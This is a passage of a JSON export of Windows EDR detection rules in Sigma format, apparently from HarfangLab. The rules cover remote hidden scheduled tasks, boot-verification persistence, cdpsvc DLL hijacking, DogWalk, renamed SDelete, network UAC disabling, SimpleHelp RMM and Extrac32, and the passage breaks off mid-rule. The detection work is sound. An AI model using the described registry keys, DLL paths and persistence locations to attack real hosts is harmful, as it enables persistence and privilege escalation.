"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626921Z",
"creation_date": "2026-03-23T11:45:34.626923Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626927Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cybertriage.com/blog/windows-scheduled-tasks-for-dfir-investigations/",
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1053_suspicious_scheduled_task_params.yml",
"content": "title: Suspiciously Named Hidden Scheduled Task Created Remotely\nid: 911369b2-1f0e-4f72-bccf-22e1cf3fb1e2\ndescription: |\n Detects the creation or update of a scheduled task commonly associated with hacking tools such as NetExec.\n Threat actors may choose to execute their code by creating scheduled tasks on remote systems as a way to create persistence, escalate privileges and evade defenses.\n It is recommended to click the \"Task Information\" button and investigate the contents of the scheduled task thoroughly to determine maliciousness, as well as to investigate any surrounding activity.\nreferences:\n - https://www.cybertriage.com/blog/windows-scheduled-tasks-for-dfir-investigations/\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2025/11/20\nmodified: 2026/02/09\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.ScheduledTask\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: scheduled_task\ndetection:\n selection:\n OperationType:\n - 'create'\n - 'update'\n\n IsRemote: 'true'\n SessionLogonType: 3\n TaskHidden: 'true'\n TaskName:\n - '\\\\?'\n - '\\\\??'\n - '\\\\???'\n - '\\\\????'\n - '\\\\?????'\n - '\\\\??????'\n - '\\\\???????'\n - '\\\\????????'\n - '\\\\?????????'\n - '\\\\??????????'\n - '\\\\???????????'\n - '\\\\????????????'\n - '\\\\?????????????'\n - '\\\\??????????????'\n - '\\\\???????????????'\n - '\\\\????????????????'\n\n exclusion_ccleaner:\n TaskName: '\\CCleaner Update'\n FirstActionCommandLine:\n - '?:\\Program Files\\CCleaner\\CCUpdate.exe'\n - '?:\\Program Files\\CCleaner\\CCUpdate.exe '\n - '?:\\CCUpdate.exe'\n - '?:\\CCUpdate.exe '\n\n exclusion_amdlink_update:\n TaskName: '\\AMDLinkUpdate'\n FirstActionCommandLine: '?:\\Program Files\\AMD\\CIM\\Bin64\\InstallManagerApp.exe -AMDLinkUpdate'\n\n exclusion_audittool:\n TaskName: '\\audittool??'\n FirstActionCommandLine|endswith: '\\audit_tool_x64.exe '\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "911369b2-1f0e-4f72-bccf-22e1cf3fb1e2",
"rule_name": "Suspiciously Named Hidden Scheduled Task Created Remotely",
"rule_description": "Detects the creation or update of a scheduled task commonly associated with hacking tools such as NetExec.\nThreat actors may choose to execute their code by creating scheduled tasks on remote systems as a way to create persistence, escalate privileges and evade defenses.\nIt is recommended to click the \"Task Information\" button and investigate the contents of the scheduled task thoroughly to determine maliciousness, as well as to investigate any surrounding activity.\n",
"rule_creation_date": "2025-11-20",
"rule_modified_date": "2026-02-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "913fc831-7436-4351-96d1-a753786a73e6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080742Z",
"creation_date": "2026-03-23T11:45:34.080744Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080748Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cyberark.com/resources/threat-research-blog/persistence-techniques-that-persist",
"https://persistence-info.github.io/Data/bootverificationprogram.html",
"https://attack.mitre.org/techniques/T1547/001/"
],
"name": "t1547_001_bootverificationprogram_persistence.yml",
"content": "title: Persistence via Boot Verification Program Added\nid: 913fc831-7436-4351-96d1-a753786a73e6\ndescription: |\n Detects when a new boot verification program is added using the registry.\n Microsoft allows users to define a custom boot verification program by creating a specific registry key.\n The Service Control Manager (\"services.exe\") will execute the boot verification program at each boot.\n It is recommended to investigate the process that modified the registry and the value details for suspicious activities.\nreferences:\n - https://www.cyberark.com/resources/threat-research-blog/persistence-techniques-that-persist\n - https://persistence-info.github.io/Data/bootverificationprogram.html\n - https://attack.mitre.org/techniques/T1547/001/\ndate: 2024/11/12\nmodified: 2025/08/20\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\BootVerificationProgram\\ImagePath'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "913fc831-7436-4351-96d1-a753786a73e6",
"rule_name": "Persistence via Boot Verification Program Added",
"rule_description": "Detects when a new boot verification program is added using the registry.\nMicrosoft allows users to define a custom boot verification program by creating a specific registry key.\nThe Service Control Manager (\"services.exe\") will execute the boot verification program at each boot.\nIt is recommended to investigate the process that modified the registry and the value details for suspicious activities.\n",
"rule_creation_date": "2024-11-12",
"rule_modified_date": "2025-08-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1547.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9146b63f-6436-4d09-a566-f5662dbf44bd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.099191Z",
"creation_date": "2026-03-23T11:45:34.099193Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.099197Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://itm4n.github.io/cdpsvc-dll-hijacking/",
"https://github.com/sailay1996/CdpSvcLPE",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_cdpsvc.yml",
"content": "title: DLL Hijacking via cdpsvc service\nid: 9146b63f-6436-4d09-a566-f5662dbf44bd\ndescription: |\n Detects a potential Windows DLL search order hijacking via cdpsvc service.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n The cdpsvc service tries to load a non-existing DLL (cdpsgshims.dll) without specifying its absolute path. By putting a malicious DLL with the same name in a writable system path folder, attackers can perform privilege escalation to NT AUTHORITY\\LOCAL SERVICE .\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://itm4n.github.io/cdpsvc-dll-hijacking/\n - https://github.com/sailay1996/CdpSvcLPE\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/05/27\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'svchost.exe'\n ProcessSignature: 'Microsoft Windows Publisher'\n ImageLoaded|endswith: '\\cdpsgshims.dll'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n condition: selection and not filter_signature_imageloaded\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9146b63f-6436-4d09-a566-f5662dbf44bd",
"rule_name": "DLL Hijacking via cdpsvc service",
"rule_description": "Detects a potential Windows DLL search order hijacking via cdpsvc service.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nThe cdpsvc service tries to load a non-existing DLL (cdpsgshims.dll) without specifying its absolute path. By putting a malicious DLL with the same name in a writable system path folder, attackers can perform privilege escalation to NT AUTHORITY\\LOCAL SERVICE .\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-05-27",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "915cdabc-0cff-42c9-8234-df956175a16d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084606Z",
"creation_date": "2026-03-23T11:45:34.084608Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084612Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd",
"https://blog.0patch.com/2022/06/microsoft-diagnostic-tools-dogwalk.html",
"https://attack.mitre.org/techniques/T1204/002/",
"https://attack.mitre.org/techniques/T1218/",
"https://attack.mitre.org/techniques/T1566/"
],
"name": "t1204_002_dogwalk_attack.yml",
"content": "title: DogWalk Attack Detected\nid: 915cdabc-0cff-42c9-8234-df956175a16d\ndescription: |\n Detects file creations by the msdt.exe process in a suspicious location which could be a sign of the exploitation of the DogWalk vulnerability.\n Microsoft Support Diagnostics Tool can trigger a bug related to a path traversal (aka DogWalk) via a crafted .diagcab file.\n For instance, once a malicious .diagcab file is opened, a new file can be saved under the Startup directory, and will be executed by the operating system at the next host startup.\n It is recommended to verify the content of the created file to determine legitimacy.\nreferences:\n - https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd\n - https://blog.0patch.com/2022/06/microsoft-diagnostic-tools-dogwalk.html\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1218/\n - https://attack.mitre.org/techniques/T1566/\ndate: 2024/12/05\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1218\n - attack.initial_access\n - attack.t1566\n - classification.Windows.Source.Filesystem\n - classification.Windows.Exploit.CVE-2022-34713\n - classification.Windows.Exploit.DogWalk\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection:\n Image|endswith: '\\msdt.exe'\n Kind:\n - 'create'\n - 'write'\n Path:\n - '?:\\Windows\\SysWOW64\\\\*'\n - '?:\\Windows\\System32\\\\*'\n - '?:\\Windows\\Sysvol\\\\*'\n - '?:\\Users\\Public\\\\*'\n - '*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\\*'\n - '*\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\\*'\n - '*.lnk'\n - '*\\Documents\\PowerShell\\profile.ps1'\n - '*\\Documents\\WindowsPowerShell\\profile.ps1'\n - '*\\System32\\WindowsPowerShell\\v1.0\\profile.ps1'\n - '*\\Documents\\PowerShell\\\\*_profile.ps1'\n - '*\\Documents\\WindowsPowerShell\\\\*_profile.ps1'\n - '*\\System32\\WindowsPowerShell\\v1.0\\\\*_profile.ps1'\n - '?:\\Windows\\system32\\spool\\PRTPROCS\\\\*'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Word\\Startup\\\\*'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Excel\\XLStart\\\\*'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Addins\\\\*'\n - '*\\AppData\\Roaming\\Microsoft\\Outlook\\VbaProject.OTM'\n\n filter_systemprofile:\n Path|startswith: '?:\\Windows\\System32\\config\\systemprofile\\AppData\\'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "915cdabc-0cff-42c9-8234-df956175a16d",
"rule_name": "DogWalk Attack Detected",
"rule_description": "Detects file creations by the msdt.exe process in a suspicious location which could be a sign of the exploitation of the DogWalk vulnerability.\nMicrosoft Support Diagnostics Tool can trigger a bug related to a path traversal (aka DogWalk) via a crafted .diagcab file.\nFor instance, once a malicious .diagcab file is opened, a new file can be saved under the Startup directory, and will be executed by the operating system at the next host startup.\nIt is recommended to verify the content of the created file to determine legitimacy.\n",
"rule_creation_date": "2024-12-05",
"rule_modified_date": "2025-02-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1204.002",
"attack.t1218",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9171b532-aeaa-4ef7-a4d3-94ba1796194d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080211Z",
"creation_date": "2026-03-23T11:45:34.080213Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080218Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://technet.microsoft.com/en-us/en-en/sysinternals/sdelete.aspx",
"https://attack.mitre.org/techniques/T1070/004/",
"https://attack.mitre.org/software/S0195/"
],
"name": "t1070_004_sdelete_renamed.yml",
"content": "title: Renamed SDelete Tool Execution\nid: 9171b532-aeaa-4ef7-a4d3-94ba1796194d\ndescription: |\n Detects execution of renamed SDelete tool which is an application that securely deletes data in a way that makes it unrecoverable.\n This tool is part of the Microsoft Sysinternals suite tools and it's often used by attackers to remove files left behind by their malicious activities.\n It is recommended to verify if the usage of this tool is legitimate.\nreferences:\n - https://technet.microsoft.com/en-us/en-en/sysinternals/sdelete.aspx\n - https://attack.mitre.org/techniques/T1070/004/\n - https://attack.mitre.org/software/S0195/\ndate: 2021/06/18\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.004\n - attack.s0195\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.SDelete\n - classification.Windows.Behavior.Deletion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - OriginalFileName: 'sdelete.exe'\n - InternalName: 'SDelete'\n exclusion:\n - Image|endswith:\n - '\\sdelete.exe'\n - '\\sdelete64.exe'\n condition: selection and not exclusion\nlevel: medium\n# level: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9171b532-aeaa-4ef7-a4d3-94ba1796194d",
"rule_name": "Renamed SDelete Tool Execution",
"rule_description": "Detects execution of renamed SDelete tool which is an application that securely deletes data in a way that makes it unrecoverable.\nThis tool is part of the Microsoft Sysinternals suite tools and it's often used by attackers to remove files left behind by their malicious activities.\nIt is recommended to verify if the usage of this tool is legitimate.\n",
"rule_creation_date": "2021-06-18",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "91774714-66bb-4eb8-8298-8472ab14056b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620774Z",
"creation_date": "2026-03-23T11:45:34.620777Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620781Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/troubleshoot/windows-server/windows-security/user-account-control-and-remote-restriction",
"https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_disable_localaccounttokenfilterpolicy.yml",
"content": "title: Network UAC Restrictions Disabled\nid: 91774714-66bb-4eb8-8298-8472ab14056b\ndescription: |\n Detects when the Network UAC is disabled by setting the LocalAccountTokenFilerPolicy registry value to 0 (Disabled).\n When set, this enables an attacker to connect remotely to the machine (WMI, SCM, SMB, ...) using a privilege local account with full administrators rights.\n This can be the prelude to an attack using the wmiexec tool.\n It is recommended to investigate if the process setting the registry value has legitimate reasons to do so.\nreferences:\n - https://docs.microsoft.com/en-us/troubleshoot/windows-server/windows-security/user-account-control-and-remote-restriction\n - https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167\n - https://attack.mitre.org/techniques/T1112/\ndate: 2020/09/28\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.execution\n - attack.lateral_movement\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy'\n Details|contains: '?WORD' # Any non-zero value works, not just DWORD (0x00000001)\n\n filter_zero:\n Details: 'DWORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_device_enroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n ProcessParentImage: '?:\\Windows\\system32\\svchost.exe'\n\n exclusion_bladelogic:\n ProcessImage:\n - '?:\\Program Files\\BMC Software\\BladeLogic\\RSC\\sbin\\bldeploy.exe'\n - '?:\\Program Files\\BladeLogic\\RSC\\sbin\\bldeploy.exe'\n\n exclusion_ninjarmm:\n - ProcessGrandparentOriginalFileName: 'NinjaRMMAgent'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'NinjaOne LLC'\n - ProcessAncestors|contains: '|?:\\Program Files (x86)\\\\*\\NinjaRMMAgent.exe|'\n\n exclusion_omadmclient:\n ProcessImage: '?:\\Windows\\System32\\omadmclient.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_minint:\n ProcessParentImage: '?:\\MININT\\Tools\\X64\\TsManager.exe'\n\n exclusion_puppet:\n ProcessParentImage: '?:\\Program Files\\Puppet Labs\\Puppet\\puppet\\bin\\ruby.exe'\n\n exclusion_ccm:\n ProcessAncestors|contains: '|?:\\Windows\\CCM\\TSManager.exe|'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "91774714-66bb-4eb8-8298-8472ab14056b",
"rule_name": "Network UAC Restrictions Disabled",
"rule_description": "Detects when the Network UAC is disabled by setting the LocalAccountTokenFilerPolicy registry value to 0 (Disabled).\nWhen set, this enables an attacker to connect remotely to the machine (WMI, SCM, SMB, ...) using a privilege local account with full administrators rights.\nThis can be the prelude to an attack using the wmiexec tool.\nIt is recommended to investigate if the process setting the registry value has legitimate reasons to do so.\n",
"rule_creation_date": "2020-09-28",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "91acc287-552c-4012-a196-dbfa1314ba97",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603866Z",
"creation_date": "2026-03-23T11:45:34.603885Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603893Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708",
"https://attack.mitre.org/techniques/T1219/002/"
],
"name": "t1219_002_abnormal_simplehelp_execution.yml",
"content": "title: Abnormal SimpleHelp RMM Execution\nid: 91acc287-552c-4012-a196-dbfa1314ba97\ndescription: |\n Detects the execution of SimpleHelp RMM with an unusual process name.\n SimpleHelp RMM is a Remote Access Tool (RAT) which can be used by attackers to establish an interactive command and control channel to target systems within protected networks.\n It is recommended to verify if the usage of this tool is legitimate.\nreferences:\n - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\n - https://attack.mitre.org/techniques/T1219/002/\ndate: 2025/06/20\nmodified: 2025/06/27\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1219.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.RMM.SimpleHelp\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Description: 'SimpleHelp Remote Access Client'\n\n filter_legitimate_image_name:\n ProcessName:\n - '*Remote Access*'\n - 'elev_win.exe'\n - 'session_win.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "91acc287-552c-4012-a196-dbfa1314ba97",
"rule_name": "Abnormal SimpleHelp RMM Execution",
"rule_description": "Detects the execution of SimpleHelp RMM with an unusual process name.\nSimpleHelp RMM is a Remote Access Tool (RAT) which can be used by attackers to establish an interactive command and control channel to target systems within protected networks.\nIt is recommended to verify if the usage of this tool is legitimate.\n",
"rule_creation_date": "2025-06-20",
"rule_modified_date": "2025-06-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "91b1fef8-d05f-4b4b-8167-4c78611f980a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071137Z",
"creation_date": "2026-03-23T11:45:34.071139Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071144Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://twitter.com/ShadowChasing1/status/1557287930267578368?t=gO0K_WXj3sYgyRls0DLS-A&s=19",
"https://lolbas-project.github.io/lolbas/Binaries/Extrac32/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_extrac32.yml",
"content": "title: Suspicious Extrac32 Execution\nid: 91b1fef8-d05f-4b4b-8167-4c78611f980a\ndescription: |\n Detects the execution of the Extrac32.exe Windows binary.\n Extrac32.exe is a legitimate Microsoft tool used for extracting files from .cab archive files.\n However, attackers may misuse it to extract malicious payloads from specially crafted cabinet files or execute arbitrary code. This technique can be used for lateral movement, data exfiltration, or persistence within a network.\n It is recommended to investigate the source of this activity, analyze the command-line arguments to identify any suspicious file paths or contents, and review any other executions in the timeline.\nreferences:\n - https://twitter.com/ShadowChasing1/status/1557287930267578368?t=gO0K_WXj3sYgyRls0DLS-A&s=19\n - https://lolbas-project.github.io/lolbas/Binaries/Extrac32/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/08/23\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Extrac32\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n 